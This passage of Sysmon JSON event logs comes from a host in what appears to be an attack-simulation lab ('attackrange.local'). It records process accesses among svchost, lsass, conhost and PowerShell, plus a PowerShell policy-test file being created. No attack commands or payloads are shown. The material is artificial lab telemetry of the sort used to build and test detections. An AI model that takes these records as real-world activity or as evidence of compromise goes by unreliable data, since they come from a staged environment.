ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.573\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D9D30800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.573","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D9D30800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.589\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-0010D9D30800}\r\nProcessId: 3864\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_onwzkjfi.ifz.ps1\r\nCreationUtcTime: 2020-08-01 06:55:22.589","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.589","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-0010D9D30800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_onwzkjfi.ifz.ps1","CreationUtcTime":"2020-08-01 06:55:22.589","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.620\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D9D30800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 